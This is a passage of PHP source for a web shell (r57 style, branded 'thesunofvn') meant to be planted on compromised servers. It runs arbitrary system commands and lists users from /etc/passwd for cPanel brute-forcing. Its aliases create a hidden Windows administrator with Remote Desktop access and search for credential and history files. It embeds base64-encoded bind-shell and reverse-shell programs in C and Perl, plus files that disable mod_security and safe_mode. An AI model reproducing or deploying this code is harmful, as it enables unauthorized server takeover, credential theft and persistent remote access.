  1294. 'eng_text118'=>'File copied',
  1295. 'eng_text119'=>'Cant copy file',
  1296. 'eng_text120'=>'SQL-Server',
  1297. 'eng_text121'=>'Vbulletin Deface',
  1298. 'eng_text122'=>'ln -s',
  1299. 'eng_text123'=>'Brute Cpanel Account',
  1300. 'eng_text124'=>'About me',
  1301. 'eng_text125'=>'Bypass php 5.2.6',
  1302. 'eng_text127'=>'Bypass php 5.2.9',
  1303. 'eng_text128'=>'Destroy file....',
  1304. 'eng_text129'=>'Useful',
  1305. 'eng_text130'=>'Downloaders',
  1306. 'eng_text131'=>'PHP Bypass',
  1307. 'eng_err0'=>'Error! Can\'t write in file ',
  1308. 'eng_err1'=>'Error! Can\'t read file ',
  1309. 'eng_err2'=>'Error! Can\'t create ',
  1310. 'eng_err5'=>'Error! Can\'t change dir on ftp',
  1311. 'eng_text200'=>'read file from vul copy()',
  1312. 'eng_text202'=>'where file in server',
  1313. 'eng_text203'=>'read file from vul ini_restore()',
  1314. 'eng_text204'=>'Show list users',
  1315. 'eng_text205'=>'write shell in this side',
  1316. 'eng_text206'=>'read dir',
  1317. 'eng_text207'=>'read dir from vul reg_glob',
  1318. 'eng_text209'=>'read dir from vul root',
  1319. 'eng_text210'=>'DeZender ',
  1320. 'eng_text211'=>'safe_mode off',
  1321. 'eng_text212'=>'Close safe_mode with php.ini',
  1322. 'eng_text213'=>'Close security_mod with .htaccess',
  1323. 'eng_text218'=>'write ini.php file to close safe_mode with ini_restore vul',
  1324. 'eng_text219'=>'Get file to server in safe_mode and change name',
  1325. 'eng_text223'=>'read file from funcution',
  1326. 'eng_text224'=>'read file from PLUGIN',
  1327. 'eng_text226' => 'Write to file',
  1328. 'eng_text230' => 'ionCube extension safe_mode bypass',
  1329. 'eng_text231' => 'win32std extension safe_mode bypass',
  1330. 'eng_text232' => 'win32service extension safe_mode bypass',
  1331. 'eng_text233' => 'perl extension safe_mode bypass',
  1332. 'eng_text234' => 'FFI extension safe_mode bypass',
  1333. 'eng_butt65'=>'Write',
  1334. );
  1335.  
  1336. $aliases=array(
  1337. '________________for server unix ______________-'=>'dir -ao',
  1338. 'find config* files'=>'find / -type f -name "config*"',
  1339. 'find config* files in current dir'=>'find . -type f -name "config*"',
  1340. 'find all writable files'=>'find / -type f -perm -2 -ls',
  1341. 'find all writable files in current dir'=>'find . -type f -perm -2 -ls',
  1342. 'find all writable directories'=>'find /  -type d -perm -2 -ls',
  1343. 'find all writable directories in current dir'=>'find . -type d -perm -2 -ls',
  1344. 'find all writable directories and files'=>'find / -perm -2 -ls',
  1345. 'find all writable directories and files in current dir'=>'find . -perm -2 -ls',
  1346. 'find all service.pwd files'=>'find / -type f -name service.pwd',
  1347. 'find service.pwd files in current dir'=>'find . -type f -name service.pwd',
  1348. 'find all .bash_history files'=>'find / -type f -name .bash_history',
  1349. 'find .bash_history files in current dir'=>'find . -type f -name .bash_history',
  1350. 'find all .mysql_history files'=>'find / -type f -name .mysql_history',
  1351. 'find .mysql_history files in current dir'=>'find . -type f -name .mysql_history',
  1352. 'show opened ports'=>'netstat -an | grep -i listen',
  1353. '________________for server windows ______________-'=>'dir',
  1354. '1_add new user'=>'net user thesunofvn 123123 /add',
  1355. '2_add your user for admin group'=>'net localgroup administrators thesunofvn /add',
  1356. '3_add your user for Remote Desktop group'=>'net localgroup "Remote Desktop Users" thesunofvn /add',
  1357. '----------------------------------------------------------------------------------------------------'=>'ls -la'
  1358. );
  1359. $table_up1  = "<tr><td class=main bgcolor=Black
  1360. ><font face=Verdana size=-2><b><div class=tt align=center>:: ";
  1361. $table_up2  = " ::</div></b></font></td></tr><tr><td class=main>";
  1362. $table_up3  = "<table width=100% cellpadding=0 cellspacing=0 bgcolor=Black><tr><td class=main>";
  1363. $table_end1 = "</td></tr>";
  1364. $arrow = " <font face=Webdings color=#2aff00>4</font>";
  1365. $lb = "<font color=#2aff00>[</font>";
  1366. $rb = "<font color=#2aff00>]</font>";
  1367. $font = "<font face=Verdana size=-2>";
  1368. $ts = "<table class=table1 width=100% align=center>";
  1369. $te = "</table>";
  1370. $fs = "<form name=form method=POST>";
  1371. $fe = "</form>";
  1372.  
  1373. if(isset($_GET['users']))
  1374.  {
  1375.  echo $head;
  1376.  if(!$users=get_users()) { echo "<center><font face=Verdana size=-2 color=#2aff00>".$lang[$language.'_text96']."</font></center>"; }
  1377.  else
  1378.   {
  1379.   echo '<center><textarea cols=20 rows=20>';
  1380.   foreach($users as $user) { echo $user."\n"; }
  1381.   echo '</textarea></center>';
  1382.   }
  1383.  echo "<div align=center><br><b><a href=".$_SERVER['PHP_SELF']."?brute&thesunofvn=crack><font size=5 color=Red>BRUTE IT!</font></b></a><br><br><font face=Verdana size=-2><b>[ <a href=".$_SERVER['PHP_SELF'].">BACK</a> ]</b></font></div>"; die();
  1384.  }
  1385.  
  1386. if (!empty($_POST['dir'])) { @chdir($_POST['dir']); }
  1387. $dir = @getcwd();
  1388. $unix = 0;
  1389. if(strlen($dir)>1 && $dir[1]==":") $unix=0; else $unix=1;
  1390. if(empty($dir))
  1391.  {
  1392.  $os = getenv('OS');
  1393.  if(empty($os)){ $os = php_uname(); }
  1394.  if(empty($os)){ $os ="-"; $unix=1; }
  1395.  else
  1396.     {
  1397.     if(@eregi("^win",$os)) { $unix = 0; }
  1398.     else { $unix = 1; }
  1399.     }
  1400.  }
  1401. if(!empty($_POST['s_dir']) && !empty($_POST['s_text']) && !empty($_POST['cmd']) && $_POST['cmd'] == "search_text")
  1402.   {
  1403.     echo $head;
  1404.     if(!empty($_POST['s_mask']) && !empty($_POST['m'])) { $sr = new SearchResult($_POST['s_dir'],$_POST['s_text'],$_POST['s_mask']); }
  1405.     else { $sr = new SearchResult($_POST['s_dir'],$_POST['s_text']); }
  1406.     $sr->SearchText(0,0);
  1407.     $res = $sr->GetResultFiles();
  1408.     $found = $sr->GetMatchesCount();
  1409.     $titles = $sr->GetTitles();
  1410.     $r = "";
  1411.     if($found > 0)
  1412.     {
  1413.       $r .= "<TABLE width=100%>";
  1414.       foreach($res as $file=>$v)
  1415.       {
  1416.         $r .= "<TR>";
  1417.         $r .= "<TD class=main colspan=2><font face=Verdana size=-2><b>".ws(3);
  1418.         $r .= (!$unix)? str_replace("/","\\",$file) : $file;
  1419.         $r .= "</b></font></ TD>";
  1420.         $r .= "</TR>";
  1421.         foreach($v as $a=>$b)
  1422.         {
  1423.           $r .= "<TR>";
  1424.           $r .= "<TD class=main align=center><B><font face=Verdana size=-2>".$a."</font></B></TD>";
  1425.           $r .= "<TD class=main><font face=Verdana size=-2>".ws(2).$b."</font></TD>";
  1426.           $r .= "</TR>\n";
  1427.         }
  1428.       }
  1429.       $r .= "</TABLE>";
  1430.     echo $r;
  1431.     }
  1432.     else
  1433.     {
  1434.       echo "<P align=center><B><font face=Verdana size=-2>".$lang[$language.'_text56']."</B></font></P>";
  1435.     }
  1436.   echo "<br><div align=center><font face=Verdana size=-2><b>[ <a href=".$_SERVER['PHP_SELF'].">BACK</a> ]</b></font></div>";
  1437.   die();
  1438.   }
  1439. if(!$safe_mode && strpos(ex("echo abcr57"),"r57")!=3) { $safe_mode = 1; }
  1440. $SERVER_SOFTWARE = getenv('SERVER_SOFTWARE');
  1441. if(empty($SERVER_SOFTWARE)){ $SERVER_SOFTWARE = "-"; }
  1442. function ws($i)
  1443. {
  1444. return @str_repeat(" ",$i);
  1445. }
  1446. function ex($cfe)
  1447. {
  1448.  $res = '';
  1449.  if (!empty($cfe))
  1450.  {
  1451.   if(function_exists('exec'))
  1452.    {
  1453.     @exec($cfe,$res);
  1454.     $res = join("\n",$res);
  1455.    }
  1456.   elseif(function_exists('shell_exec'))
  1457.    {
  1458.     $res = @shell_exec($cfe);
  1459.    }
  1460.   elseif(function_exists('system'))
  1461.    {
  1462.     @ob_start();
  1463.     @system($cfe);
  1464.     $res = @ob_get_contents();
  1465.     @ob_end_clean();
  1466.    }
  1467.   elseif(function_exists('passthru'))
  1468.    {
  1469.     @ob_start();
  1470.     @passthru($cfe);
  1471.     $res = @ob_get_contents();
  1472.     @ob_end_clean();
  1473.    }
  1474.   elseif(@is_resource($f = @popen($cfe,"r")))
  1475.   {
  1476.    $res = "";
  1477.    while(!@feof($f)) { $res .= @fread($f,1024); }
  1478.    @pclose($f);
  1479.   }
  1480.  }
  1481.  return $res;
  1482. }
  1483. function get_users()
  1484. {
  1485.   $users = array();
  1486. if (file_exists('passwd.txt')) {
  1487.  $rows=file('passwd.txt');
  1488.   } else {
  1489.  $rows=file('/etc/passwd');
  1490.   }
  1491.   if(!$rows) return 0;
  1492.   foreach ($rows as $string)
  1493.    {
  1494.         $user = @explode(":",$string);
  1495.         if(substr($string,0,1)!='#') array_push($users,$user[0]);
  1496.    }
  1497.   return $users;
  1498. }
  1499. function err($n,$txt='')
  1500. {
  1501. echo '<table width=100% cellpadding=0 cellspacing=0><tr><td class=main bgcolor=Black><font color=Red face=Verdana size=-2><div align=center><b>';
  1502. echo $GLOBALS['lang'][$GLOBALS['language'].'_err'.$n];
  1503. if(!empty($txt)) { echo " $txt"; }
  1504. echo '</b></div></font></td></tr></table>';
  1505. return null;
  1506. }
  1507. function perms($mode)
  1508. {
  1509. if (!$GLOBALS['unix']) return 0;
  1510. if( $mode & 0x1000 ) { $type='p'; }
  1511. else if( $mode & 0x2000 ) { $type='c'; }
  1512. else if( $mode & 0x4000 ) { $type='d'; }
  1513. else if( $mode & 0x6000 ) { $type='b'; }
  1514. else if( $mode & 0x8000 ) { $type='-'; }
  1515. else if( $mode & 0xA000 ) { $type='l'; }
  1516. else if( $mode & 0xC000 ) { $type='s'; }
  1517. else $type='u';
  1518. $owner["read"] = ($mode & 00400) ? 'r' : '-';
  1519. $owner["write"] = ($mode & 00200) ? 'w' : '-';
  1520. $owner["execute"] = ($mode & 00100) ? 'x' : '-';
  1521. $group["read"] = ($mode & 00040) ? 'r' : '-';
  1522. $group["write"] = ($mode & 00020) ? 'w' : '-';
  1523. $group["execute"] = ($mode & 00010) ? 'x' : '-';
  1524. $world["read"] = ($mode & 00004) ? 'r' : '-';
  1525. $world["write"] = ($mode & 00002) ? 'w' : '-';
  1526. $world["execute"] = ($mode & 00001) ? 'x' : '-';
  1527. if( $mode & 0x800 ) $owner["execute"] = ($owner['execute']=='x') ? 's' : 'S';
  1528. if( $mode & 0x400 ) $group["execute"] = ($group['execute']=='x') ? 's' : 'S';
  1529. if( $mode & 0x200 ) $world["execute"] = ($world['execute']=='x') ? 't' : 'T';
  1530. $s=sprintf("%1s", $type);
  1531. $s.=sprintf("%1s%1s%1s", $owner['read'], $owner['write'], $owner['execute']);
  1532. $s.=sprintf("%1s%1s%1s", $group['read'], $group['write'], $group['execute']);
  1533. $s.=sprintf("%1s%1s%1s", $world['read'], $world['write'], $world['execute']);
  1534. return trim($s);
  1535. }
  1536. function in($type,$name,$size,$value,$checked=0)
  1537. {
  1538.  $ret = "<input type=".$type." name=".$name." ";
  1539.  if($size != 0) { $ret .= "size=".$size." "; }
  1540.  $ret .= "value=\"".$value."\"";
  1541.  if($checked) $ret .= " checked";
  1542.  return $ret.">";
  1543. }
  1544. function which($pr)
  1545. {
  1546. $path = ex("which $pr");
  1547. if(!empty($path)) { return $path; } else { return $pr; }
  1548. }
  1549. function cf($fname,$text)
  1550. {
  1551.  $w_file=@fopen($fname,"w") or err(0);
  1552.  if($w_file)
  1553.  {
  1554.  @fputs($w_file,@base64_decode($text));
  1555.  @fclose($w_file);
  1556.  }
  1557. }
  1558. function sr($l,$t1,$t2)
  1559.  {
  1560.  return "<tr class=tr1><td class=td1 width=".$l."% align=right>".$t1."</td><td class=td1 align=left>".$t2."</td></tr>";
  1561.  }
  1562. if (!@function_exists("view_size"))
  1563. {
  1564. function view_size($size)
  1565. {
  1566.  if($size >= 1073741824) {$size = @round($size / 1073741824 * 100) / 100 . " GB";}
  1567.  elseif($size >= 1048576) {$size = @round($size / 1048576 * 100) / 100 . " MB";}
  1568.  elseif($size >= 1024) {$size = @round($size / 1024 * 100) / 100 . " KB";}
  1569.  else {$size = $size . " B";}
  1570.  return $size;
  1571. }
  1572. }
  1573.   function DirFilesR($dir,$types='')
  1574.   {
  1575.     $files = Array();
  1576.     if(($handle = @opendir($dir)))
  1577.     {
  1578.       while (false !== ($file = @readdir($handle)))
  1579.       {
  1580.         if ($file != "." && $file != "..")
  1581.         {
  1582.           if(@is_dir($dir."/".$file))
  1583.             $files = @array_merge($files,DirFilesR($dir."/".$file,$types));
  1584.           else
  1585.           {
  1586.             $pos = @strrpos($file,".");
  1587.             $ext = @substr($file,$pos,@strlen($file)-$pos);
  1588.             if($types)
  1589.             {
  1590.               if(@in_array($ext,explode(';',$types)))
  1591.                 $files[] = $dir."/".$file;
  1592.             }
  1593.             else
  1594.               $files[] = $dir."/".$file;
  1595.           }
  1596.         }
  1597.       }
  1598.       @closedir($handle);
  1599.     }
  1600.     return $files;
  1601.   }
  1602.   class SearchResult
  1603.   {
  1604.     var $text;
  1605.     var $FilesToSearch;
  1606.     var $ResultFiles;
  1607.     var $FilesTotal;
  1608.     var $MatchesCount;
  1609.     var $FileMatschesCount;
  1610.     var $TimeStart;
  1611.     var $TimeTotal;
  1612.     var $titles;
  1613.     function SearchResult($dir,$text,$filter='')
  1614.     {
  1615.       $dirs = @explode(";",$dir);
  1616.       $this->FilesToSearch = Array();
  1617.       for($a=0;$a<count($dirs);$a++)
  1618.         $this->FilesToSearch = @array_merge($this->FilesToSearch,DirFilesR($dirs[$a],$filter));
  1619.       $this->text = $text;
  1620.       $this->FilesTotal = @count($this->FilesToSearch);
  1621.       $this->TimeStart = getmicrotime();
  1622.       $this->MatchesCount = 0;
  1623.       $this->ResultFiles = Array();
  1624.       $this->FileMatchesCount = Array();
  1625.       $this->titles = Array();
  1626.     }
  1627.     function GetFilesTotal() { return $this->FilesTotal; }
  1628.     function GetTitles() { return $this->titles; }
  1629.     function GetTimeTotal() { return $this->TimeTotal; }
  1630.     function GetMatchesCount() { return $this->MatchesCount; }
  1631.     function GetFileMatchesCount() { return $this->FileMatchesCount; }
  1632.     function GetResultFiles() { return $this->ResultFiles; }
  1633.     function SearchText($phrase=0,$case=0) {
  1634.     $qq = @explode(' ',$this->text);
  1635.     $delim = '|';
  1636.       if($phrase)
  1637.         foreach($qq as $k=>$v)
  1638.           $qq[$k] = '\b'.$v.'\b';
  1639.       $words = '('.@implode($delim,$qq).')';
  1640.       $pattern = "/".$words."/";
  1641.       if(!$case)
  1642.         $pattern .= 'i';
  1643.       foreach($this->FilesToSearch as $k=>$filename)
  1644.       {
  1645.         $this->FileMatchesCount[$filename] = 0;
  1646.         $FileStrings = @file($filename) or @next;
  1647.         for($a=0;$a<@count($FileStrings);$a++)
  1648.         {
  1649.           $count = 0;
  1650.           $CurString = $FileStrings[$a];
  1651.           $CurString = @Trim($CurString);
  1652.           $CurString = @strip_tags($CurString);
  1653.           $aa = '';
  1654.           if(($count = @preg_match_all($pattern,$CurString,$aa)))
  1655.           {
  1656.             $CurString = @preg_replace($pattern,"<SPAN style='color: #990000;'><b>\\1</b></SPAN>",$CurString);
  1657.             $this->ResultFiles[$filename][$a+1] = $CurString;
  1658.             $this->MatchesCount += $count;
  1659.             $this->FileMatchesCount[$filename] += $count;
  1660.           }
  1661.         }
  1662.       }
  1663.       $this->TimeTotal = @round(getmicrotime() - $this->TimeStart,4);
  1664.     }
  1665.   }
  1666.   function getmicrotime()
  1667.   {
  1668.     list($usec,$sec) = @explode(" ",@microtime());
  1669.     return ((float)$usec + (float)$sec);
  1670.   }
  1671. $port_bind_bd_c="I2luY2x1ZGUgPHN0ZGlvLmg+DQojaW5jbHVkZSA8c3RyaW5nLmg+DQojaW5jbHVkZSA8c3lzL3R5cGVzLmg+DQojaW5jbHVkZS
  1672. A8c3lzL3NvY2tldC5oPg0KI2luY2x1ZGUgPG5ldGluZXQvaW4uaD4NCiNpbmNsdWRlIDxlcnJuby5oPg0KaW50IG1haW4oYXJnYyxhcmd2KQ0KaW50I
  1673. GFyZ2M7DQpjaGFyICoqYXJndjsNCnsgIA0KIGludCBzb2NrZmQsIG5ld2ZkOw0KIGNoYXIgYnVmWzMwXTsNCiBzdHJ1Y3Qgc29ja2FkZHJfaW4gcmVt
  1674. b3RlOw0KIGlmKGZvcmsoKSA9PSAwKSB7IA0KIHJlbW90ZS5zaW5fZmFtaWx5ID0gQUZfSU5FVDsNCiByZW1vdGUuc2luX3BvcnQgPSBodG9ucyhhdG9
  1675. pKGFyZ3ZbMV0pKTsNCiByZW1vdGUuc2luX2FkZHIuc19hZGRyID0gaHRvbmwoSU5BRERSX0FOWSk7IA0KIHNvY2tmZCA9IHNvY2tldChBRl9JTkVULF
  1676. NPQ0tfU1RSRUFNLDApOw0KIGlmKCFzb2NrZmQpIHBlcnJvcigic29ja2V0IGVycm9yIik7DQogYmluZChzb2NrZmQsIChzdHJ1Y3Qgc29ja2FkZHIgK
  1677. ikmcmVtb3RlLCAweDEwKTsNCiBsaXN0ZW4oc29ja2ZkLCA1KTsNCiB3aGlsZSgxKQ0KICB7DQogICBuZXdmZD1hY2NlcHQoc29ja2ZkLDAsMCk7DQog
  1678. ICBkdXAyKG5ld2ZkLDApOw0KICAgZHVwMihuZXdmZCwxKTsNCiAgIGR1cDIobmV3ZmQsMik7DQogICB3cml0ZShuZXdmZCwiUGFzc3dvcmQ6IiwxMCk
  1679. 7DQogICByZWFkKG5ld2ZkLGJ1ZixzaXplb2YoYnVmKSk7DQogICBpZiAoIWNocGFzcyhhcmd2WzJdLGJ1ZikpDQogICBzeXN0ZW0oImVjaG8gd2VsY2
  1680. 9tZSB0byByNTcgc2hlbGwgJiYgL2Jpbi9iYXNoIC1pIik7DQogICBlbHNlDQogICBmcHJpbnRmKHN0ZGVyciwiU29ycnkiKTsNCiAgIGNsb3NlKG5ld
  1681. 2ZkKTsNCiAgfQ0KIH0NCn0NCmludCBjaHBhc3MoY2hhciAqYmFzZSwgY2hhciAqZW50ZXJlZCkgew0KaW50IGk7DQpmb3IoaT0wO2k8c3RybGVuKGVu
  1682. dGVyZWQpO2krKykgDQp7DQppZihlbnRlcmVkW2ldID09ICdcbicpDQplbnRlcmVkW2ldID0gJ1wwJzsgDQppZihlbnRlcmVkW2ldID09ICdccicpDQp
  1683. lbnRlcmVkW2ldID0gJ1wwJzsNCn0NCmlmICghc3RyY21wKGJhc2UsZW50ZXJlZCkpDQpyZXR1cm4gMDsNCn0=";
  1684. $port_bind_bd_pl="IyEvdXNyL2Jpbi9wZXJsDQokU0hFTEw9Ii9iaW4vYmFzaCAtaSI7DQppZiAoQEFSR1YgPCAxKSB7IGV4aXQoMSk7IH0NCiRMS
  1685. VNURU5fUE9SVD0kQVJHVlswXTsNCnVzZSBTb2NrZXQ7DQokcHJvdG9jb2w9Z2V0cHJvdG9ieW5hbWUoJ3RjcCcpOw0Kc29ja2V0KFMsJlBGX0lORVQs
  1686. JlNPQ0tfU1RSRUFNLCRwcm90b2NvbCkgfHwgZGllICJDYW50IGNyZWF0ZSBzb2NrZXRcbiI7DQpzZXRzb2Nrb3B0KFMsU09MX1NPQ0tFVCxTT19SRVV
  1687. TRUFERFIsMSk7DQpiaW5kKFMsc29ja2FkZHJfaW4oJExJU1RFTl9QT1JULElOQUREUl9BTlkpKSB8fCBkaWUgIkNhbnQgb3BlbiBwb3J0XG4iOw0KbG
  1688. lzdGVuKFMsMykgfHwgZGllICJDYW50IGxpc3RlbiBwb3J0XG4iOw0Kd2hpbGUoMSkNCnsNCmFjY2VwdChDT05OLFMpOw0KaWYoISgkcGlkPWZvcmspK
  1689. Q0Kew0KZGllICJDYW5ub3QgZm9yayIgaWYgKCFkZWZpbmVkICRwaWQpOw0Kb3BlbiBTVERJTiwiPCZDT05OIjsNCm9wZW4gU1RET1VULCI+JkNPTk4i
  1690. Ow0Kb3BlbiBTVERFUlIsIj4mQ09OTiI7DQpleGVjICRTSEVMTCB8fCBkaWUgcHJpbnQgQ09OTiAiQ2FudCBleGVjdXRlICRTSEVMTFxuIjsNCmNsb3N
  1691. lIENPTk47DQpleGl0IDA7DQp9DQp9";
  1692. $back_connect="IyEvdXNyL2Jpbi9wZXJsDQp1c2UgU29ja2V0Ow0KJGNtZD0gImx5bngiOw0KJHN5c3RlbT0gJ2VjaG8gImB1bmFtZSAtYWAiO2Vj
  1693. aG8gImBpZGAiOy9iaW4vc2gnOw0KJDA9JGNtZDsNCiR0YXJnZXQ9JEFSR1ZbMF07DQokcG9ydD0kQVJHVlsxXTsNCiRpYWRkcj1pbmV0X2F0b24oJHR
  1694. hcmdldCkgfHwgZGllKCJFcnJvcjogJCFcbiIpOw0KJHBhZGRyPXNvY2thZGRyX2luKCRwb3J0LCAkaWFkZHIpIHx8IGRpZSgiRXJyb3I6ICQhXG4iKT
  1695. sNCiRwcm90bz1nZXRwcm90b2J5bmFtZSgndGNwJyk7DQpzb2NrZXQoU09DS0VULCBQRl9JTkVULCBTT0NLX1NUUkVBTSwgJHByb3RvKSB8fCBkaWUoI
  1696. kVycm9yOiAkIVxuIik7DQpjb25uZWN0KFNPQ0tFVCwgJHBhZGRyKSB8fCBkaWUoIkVycm9yOiAkIVxuIik7DQpvcGVuKFNURElOLCAiPiZTT0NLRVQi
  1697. KTsNCm9wZW4oU1RET1VULCAiPiZTT0NLRVQiKTsNCm9wZW4oU1RERVJSLCAiPiZTT0NLRVQiKTsNCnN5c3RlbSgkc3lzdGVtKTsNCmNsb3NlKFNUREl
  1698. OKTsNCmNsb3NlKFNURE9VVCk7DQpjbG9zZShTVERFUlIpOw==";
  1699. $back_connect_c="I2luY2x1ZGUgPHN0ZGlvLmg+DQojaW5jbHVkZSA8c3lzL3NvY2tldC5oPg0KI2luY2x1ZGUgPG5ldGluZXQvaW4uaD4NCmludC
  1700. BtYWluKGludCBhcmdjLCBjaGFyICphcmd2W10pDQp7DQogaW50IGZkOw0KIHN0cnVjdCBzb2NrYWRkcl9pbiBzaW47DQogY2hhciBybXNbMjFdPSJyb
  1701. SAtZiAiOyANCiBkYWVtb24oMSwwKTsNCiBzaW4uc2luX2ZhbWlseSA9IEFGX0lORVQ7DQogc2luLnNpbl9wb3J0ID0gaHRvbnMoYXRvaShhcmd2WzJd
  1702. KSk7DQogc2luLnNpbl9hZGRyLnNfYWRkciA9IGluZXRfYWRkcihhcmd2WzFdKTsgDQogYnplcm8oYXJndlsxXSxzdHJsZW4oYXJndlsxXSkrMStzdHJ
  1703. sZW4oYXJndlsyXSkpOyANCiBmZCA9IHNvY2tldChBRl9JTkVULCBTT0NLX1NUUkVBTSwgSVBQUk9UT19UQ1ApIDsgDQogaWYgKChjb25uZWN0KGZkLC
  1704. Aoc3RydWN0IHNvY2thZGRyICopICZzaW4sIHNpemVvZihzdHJ1Y3Qgc29ja2FkZHIpKSk8MCkgew0KICAgcGVycm9yKCJbLV0gY29ubmVjdCgpIik7D
  1705. QogICBleGl0KDApOw0KIH0NCiBzdHJjYXQocm1zLCBhcmd2WzBdKTsNCiBzeXN0ZW0ocm1zKTsgIA0KIGR1cDIoZmQsIDApOw0KIGR1cDIoZmQsIDEp
  1706. Ow0KIGR1cDIoZmQsIDIpOw0KIGV4ZWNsKCIvYmluL3NoIiwic2ggLWkiLCBOVUxMKTsNCiBjbG9zZShmZCk7IA0KfQ==";
  1707. $php_ini1="c2FmZV9tb2RlICAgICAgICAgICAgICAgPSAgICAgICBPZmY=";
  1708. $htacces="PElmTW9kdWxlIG1vZF9zZWN1cml0eS5jPg0KICAgIFNlY0ZpbHRlckVuZ2luZSBPZmYNCiAgICBTZWNGaWx0ZXJTY2FuUE9TVCBPZmYNCjwvSWZNb2R1bGU+";
  1709. $sni_res="PD8NCmVjaG8gaW5pX2dldCgic2FmZV9tb2RlIik7DQplY2hvIGluaV9nZXQoIm9wZW5fYmFzZWRpciIpOw0KaW5jbHVkZSgkX0dFVFsiZmlsZSJdKTsNCmluaV9yZXN0b3JlKCJzYWZlX21vZGUiKTsNCmluaV9yZXN0b3JlKCJvcGVuX2Jhc2VkaXIiKTsNCmVjaG8gaW5pX2dldCgic2FmZV9tb2RlIik7DQplY2hvIGluaV9nZXQoIm9wZW5fYmFzZWRpciIpOw0KaW5jbHVkZSgkX0dFVFsic3MiXSk7DQo/Pg==";
  1710. if($unix)
  1711.  {
  1712.  if(!isset($_COOKIE['uname'])) { $uname = ex('uname -a'); setcookie('uname',$uname); } else { $uname = $_COOKIE['uname']; }
  1713.  if(!isset($_COOKIE['id'])) { $id = ex('id'); setcookie('id',$id); } else { $id = $_COOKIE['id']; }
  1714.  if($safe_mode) { $sysctl = '-'; }
  1715.  else if(isset($_COOKIE['sysctl'])) { $sysctl = $_COOKIE['sysctl']; }
  1716.  else
  1717.   {
  1718.    $sysctl = ex('sysctl -n kern.ostype && sysctl -n kern.osrelease');
  1719.    if(empty($sysctl)) { $sysctl = ex('sysctl -n kernel.ostype && sysctl -n kernel.osrelease'); }
  1720.    if(empty($sysctl)) { $sysctl = '-'; }
  1721.    setcookie('sysctl',$sysctl);
  1722.   }
  1723.  }
  1724.  if(!isset($_COOKIE[$lang[$language.'_text129']])) {
  1725.         $ust_u='';
  1726.         if($unix && !$safe_mode){
  1727.                 foreach ($userful as $item) {
  1728.                         if(which($item)){$ust_u.=$item;}
  1729.                 }
  1730.         }
  1731.         if (@function_exists('apache_get_modules') && @in_array('mod_perl',apache_get_modules())) {$ust_u.=", mod_perl";}
  1732.         if (@function_exists('apache_get_modules') && @in_array('mod_include',apache_get_modules())) {$ust_u.=", mod_include(SSI)";}
  1733.         if (@function_exists('pcntl_exec')) {$ust_u.=", pcntl_exec";}
  1734.         if (@extension_loaded('win32std')) {$ust_u.=", win32std_loaded";}
  1735.         if (@extension_loaded('win32service')) {$ust_u.=", win32service_loaded";}
  1736.         if (@extension_loaded('ffi')) {$ust_u.=", ffi_loaded";}
  1737.         if (@extension_loaded('perl')) {$ust_u.=", perl_loaded";}
  1738.         if(substr($ust_u,0,1)==",") {$ust_u[0]="";}
  1739.  
  1740.         $ust_u = trim($ust_u);
  1741.         }
  1742.         else
  1743.         {
  1744.         $ust_u = trim($_COOKIE[$lang[$language.'_text129']]);
  1745.  }
  1746.  if(!isset($_COOKIE[$lang[$language.'_text130']])) {
  1747.  
  1748.         $select_downloaders='<select size="1" name=with>';
  1749.         if((!@function_exists('ini_get')) || (@ini_get('allow_url_fopen') && @function_exists('file'))){$select_downloaders .= "<option value=\"fopen\">fopen</option>";$downloader="fopen";}
  1750.         if($unix && !$safe_mode){
  1751.                 foreach ($downloaders as $item) {
  1752.                         if(which($item)){$select_downloaders .= '<option value="'.$item.'">'.$item.'</option>';$downloader.=", $item";}
  1753.                 }
  1754.         }
  1755.         $select_downloaders .= '</select>';
  1756.         if(substr($downloader,0,1)==",") {$downloader[0]="";}
  1757.  
  1758.         $downloader=trim($downloader);
  1759.  
  1760.  }else {
  1761.         $select_downloaders = $_COOKIE['select_downloaders'];
  1762.         $downloader = trim($_COOKIE['downloader']);
  1763.  }
  1764. echo $head;
  1765. echo '</head>';
  1766. if(empty($_POST['cmd'])) {
  1767. $serv = array(127,192,172,10);
  1768. $addr=@explode('.', $_SERVER['SERVER_ADDR']);
  1769. $current_version = str_replace('.','',$version);
  1770. }
  1771. if ($info['security']) echo '<body>Login As (<font color="#FF0000">'.$info['title'].'</font>) <a href="?logout=1">Logout</a></p><table width=100% cellpadding=0 cellspacing=0 bgcolor=Black><tr><td class=main bgcolor=Black width=160><font face=Verdana size=1>'.ws(3).ws(3).'<b><center><font color=Red size="7">!</font><br/>thesunofvn</center></b></font></td><td class=main bgcolor=Black><font face=Verdana size=-2>';
  1772. else echo '<table width=100% cellpadding=0 cellspacing=0 bgcolor=Black><tr><td class=main bgcolor=Black width=160><font face=Verdana size=1>'.ws(3).ws(3).'<center><img src="http://upanh.biz/images/2014/09/10/rada.gif" height=180 width=200 /></center></font></td><td class=main bgcolor=Black><font face=Verdana size=-2>';
  1773. echo ws(2)."<b>".date ("d-m-Y H:i:s")."</b>";
  1774. echo ws(2).$lb." <a href=".$_SERVER['PHP_SELF']."?phpinfo title='Show phpinfo()'><b>phpinfo</b></a> ".$rb;
  1775. echo ws(2).$lb." <a href=".$_SERVER['PHP_SELF']."?phpini title='Show variables from php.ini'><b>php.ini</b></a> ".$rb;
  1776. if($unix)
  1777. {
  1778.  echo ws(2).$lb." <a href=".$_SERVER['PHP_SELF']."?cpu title='View cpu info'><b>Cpu</b></a> ".$rb;
  1779.  echo ws(2).$lb." <a href=".$_SERVER['PHP_SELF']."?mem title='View memory info'><b>Memory</b></a> ".$rb;
  1780.  echo ws(2).$lb." <a href=".$_SERVER['PHP_SELF']."?users title='Users list'><b>Users</b></a> ".$rb;
  1781.  echo ws(2).$lb." <a href=".$_SERVER['PHP_SELF']."?brute title='Brute Cpanel Account'><b>Brute</b></a> ".$rb;
  1782. echo ws(2).$lb." <a href=".$_SERVER['PHP_SELF']."?ln title='ln -s'><b>ln -s all</b></a> ".$rb;
  1783.  }
  1784. echo ws(2).$lb." <a href=".$_SERVER['PHP_SELF']."?tools title='Hash tools'><b>Tools</b></a> ".$rb;
  1785. echo ws(2).$lb." <a href=".$_SERVER['PHP_SELF']."?massbrowsersploit title='Mass Code Injection'><b>Mass Code Injection</b></a> ".$rb;
  1786. echo ws(2).$lb." <a href=".$_SERVER['PHP_SELF']."?tmp title='Delete temp files'><b>tmp</b></a> ".$rb;
  1787. echo "<br/>";
  1788. echo ws(2)."safe_mode: <b>";
  1789. echo (($safe_mode)?("<font color=#2aff00>ON</font>"):("<font color=#2aff00>OFF</font>"));
  1790. echo "</b>".ws(2);
  1791. echo "Open_Basedir: <b>";
